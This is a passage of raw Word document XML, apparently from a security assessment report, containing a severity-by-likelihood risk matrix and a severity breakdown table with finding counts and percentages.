            <w:tcW w:w="8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F582A97" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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4669DD3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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FC17F9F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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D49B3AE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Certain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="6956AA38" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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2855DFE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BBF7D0"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1173B06B"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DE68A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E43B5DD"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ED7AA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26A4B395"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ECACA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="178A1BDF"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ECACA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="285BEB17" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="0814DE83" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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CCD1085" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BBF7D0"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21FF808E"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DE68A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61F390F0"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ED7AA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="580C40B8"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ED7AA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="691BC482" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FECACA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="694E9E1E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="5FFC4D0C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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3A8F380" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E0F2FE"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="239239E9"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BBF7D0"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BC47344"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DE68A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A86C673" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FED7AA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F78264F"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ED7AA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F627A57" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="65688488" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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D249F59" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E0F2FE"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3101F8F1"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BBF7D0"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33B806B3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BBF7D0"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35E5D001"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DE68A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C697B12"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FDE68A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05A35109" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1F06375F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="100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5B1536F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E0F2FE"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EDAB718"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E0F2FE"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17AEF19B"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E0F2FE"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D7791A4"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BBF7D0"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F1AFB3F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BBF7D0"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29258258" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C870357" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t>Severity Breakdown</w:t>
      </w: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2254"/>
        <w:gridCol w:w="1803"/>
        <w:gridCol w:w="2254"/>
        <w:gridCol w:w="2705"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B7CCA" w14:paraId="062B11C1" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250"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7297F38C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000"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4A6744FC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250"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76CE4C96" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Percentage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500"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635D1CE9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Visual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1D5BB243" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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54DD4C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</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BBA91AF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5</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F73E80D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.7%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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C9A0FC4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>█████</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1134006D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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1D288EF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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4DC156F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>19</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A2F30A4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>63.3%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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F6A044E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>██████████</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="24B927DC" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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3011225" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Medium</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B21BFED" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5</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8CCC090" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.7%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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2042981" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>█████</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="4F848442" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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E3AEF45" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="16A34A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</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5FA2DCA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
